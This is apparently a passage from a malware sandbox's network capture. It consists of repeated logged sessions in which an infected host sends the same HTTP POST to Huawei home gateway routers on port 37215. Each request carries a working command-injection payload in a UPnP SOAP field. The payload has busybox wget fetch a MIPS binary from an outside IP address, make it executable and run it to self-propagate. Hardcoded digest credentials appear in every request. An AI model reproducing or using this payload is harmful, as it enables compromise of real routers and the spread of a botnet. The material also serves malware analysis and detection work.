                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          69192.168.2.2355258197.176.193.19837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.123724937 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          70192.168.2.2339482124.52.233.17637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.123724937 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          71192.168.2.2333090197.152.183.15937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.123776913 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          72192.168.2.2360380157.248.99.18537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.123800993 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          73192.168.2.234152849.88.113.18737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.123806000 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          74192.168.2.2337400197.29.88.24737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.123857975 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          75192.168.2.2349018157.30.141.19237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.123858929 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          76192.168.2.234394041.215.33.20137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.123858929 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          77192.168.2.235407641.81.111.4937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.123907089 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          78192.168.2.2357264157.64.168.8737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.124432087 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
